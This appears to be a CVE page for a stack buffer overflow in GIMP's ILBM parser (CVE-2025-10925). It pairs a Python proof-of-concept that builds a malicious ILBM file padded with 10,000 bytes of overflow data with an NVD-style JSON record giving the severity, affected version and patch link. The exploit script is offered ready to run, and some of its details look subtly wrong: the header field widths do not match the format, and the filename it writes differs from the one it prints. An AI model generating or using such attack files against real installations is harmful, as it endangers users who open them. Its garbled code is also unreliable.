CVE-2025-10925

#!/usr/bin/env python3 # CVE-2025-10925 PoC - GIMP ILBM Stack Buffer Overflow # Generate malicious ILBM file to trigger stack-based buffer overflow import struct def create_malicious_ilbm(): # ILBM file header bmhd_chunk = b'BMHD' # BitMap Header chunk type # Malicious BMHD data - crafted to overflow buffer # Standard BMHD is 20 bytes, but we provide excessive data width = 320 height = 200 bitplanes = 24 # Create BMHD chunk with oversized data bmhd_data = struct.pack('>HHBBHHHHBBHH', width, # w - width height, # h - height 0, # x - x position 0, # y - y position bitplanes, # nplanes - number of planes 0, # masking 0, # compression 0, # transparent color 0, # x aspect 0, # y aspect width, # page width height # page height ) # Add padding and overflow data overflow_payload = b'A' * 10000 # Large payload to overflow stack buffer bmhd_data += overflow_payload # Chunk size (including itself but not the size field) chunk_size = len(bmhd_data) # ILBM file structure ilbm_file = b'FORM' # IFF container ilbm_file += struct.pack('>I', 8 + 8 + chunk_size) # Total file size ilbm_file += b'ILBM' # ILBM type ilbm_file += bmhd_chunk ilbm_file += struct.pack('>I', chunk_size) ilbm_file += bmhd_data return ilbm_file if __name__ == '__main__': malicious_file = create_malicious_ilbm() with open('CVE-2025-10925 malicious.ilbm', 'wb') as f: f.write(malicious_file) print('[+] Malicious ILBM file created: CVE-2025-10925_malicious.ilbm') print('[+] This file triggers stack buffer overflow in GIMP ILBM parser')

{"cve": {"id": "CVE-2025-10925", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:35.300", "lastModified": "2025-11-04T13:14:01.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP ILBM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ILBM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27793."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2450", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-914/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}